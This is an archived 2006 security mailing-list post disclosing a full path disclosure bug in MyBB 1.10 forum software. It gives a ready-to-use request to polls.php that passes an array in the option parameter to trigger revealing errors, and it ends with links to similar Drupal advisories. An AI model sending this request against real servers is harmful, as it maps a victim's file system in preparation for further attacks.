MyBB 1.10 Full Path Disclosure

From: o.y.6@xxxxxxxxxxx
Date: 17 Mar 2006 08:47:08 -0000

D3vil-0x1 | Devil-00

New MyBB bug that will giv you the ' Full Path Disclosure ' at vic. server

MyBB 1.10 .. New Bugs

1- Full Path Disclosure

=> mybb/polls.php?action=vote&pid=[PID]&option[]=null
- Where PID Poll ID

Prev by Date: [FLSA-2006:157459-2] Updated kernel packages fix security issues
Next by Date: Microsoft Commerce Server 2002: Logon as known user with a false password
Previous by thread: [FLSA-2006:157459-2] Updated kernel packages fix security issues
Next by thread: Microsoft Commerce Server 2002: Logon as known user with a false password
Index(es):
- Date
- Thread

Relevant Pages

Drupal 7.14 <= Full Path Disclosure Vulnerability (Update)
... Drupal 7.14 <= Full Path Disclosure Vulnerability ... This information can be used for processing further attacks against the server. ... // very early in the bootstrap process, so the original value is saved in ... // This request is either a clean URL, or 'index.php', or nonsense. ...
(Bugtraq)
Drupal 7.14 <= Full Path Disclosure Vulnerability
... Drupal 7.14 <= Full Path Disclosure Vulnerability ... This information can be used for processing further attacks against the server. ... // very early in the bootstrap process, so the original value is saved in ... // This request is either a clean URL, or 'index.php', or nonsense. ...
(Bugtraq)